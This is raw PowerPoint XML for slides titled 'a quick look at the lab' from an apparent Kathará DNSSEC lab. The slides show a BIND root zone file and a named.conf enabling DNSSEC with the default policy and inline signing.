                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     ROOT-SERVER.    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root.ROOT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-SERVER. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.    IN      A       10.0.3.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>it.             IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{226E68A9-9288-A07B-574D-E8337D217901}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2712" cy="132"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B4F1100-0DED-1C17-77C4-E2A4E96819DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9AF533A-7020-9DB9-E608-40CA9B55DC84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AA45994-B9ED-00CD-214F-39224E83DC5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110249651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B6A39E-A239-63D1-D6EB-60FBCD3128B6}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22B4B3F-365B-B130-053B-0FDBEEC7142A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1814065"/>
            <a:ext cx="7641005" cy="3205608"/>
            <a:chOff x="126" y="3285"/>
            <a:chExt cx="5943" cy="1189"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF9BF31-0266-A5E5-73CE-33F8F2C3EDA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="1122"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone "." {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C73572-FC25-5AD7-809B-99DCCF201795}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="170" y="3285"/>
              <a:ext cx="2927" cy="132"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFFE3A3-6323-9C91-B85F-F408870F8A31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1B52177-57B9-3ADE-2EE0-DEB2F44CC577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF48DAD1-06F5-AB17-3980-9AB1B4C73B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C07C9D9D-B1B2-2BBB-424B-06E4D5F028AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7251554" y="1989011"/>
            <a:ext cx="4580105" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85203"/>
              <a:gd name="adj2" fmla="val 201278"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enable automatic DNSSEC key management using BIND's default policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62001C25-C7F1-6BF9-EE12-8554EFB48C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001344" y="3061162"/>
            <a:ext cx="3830316" cy="569247"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -121810"/>
              <a:gd name="adj2" fmla="val 103859"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
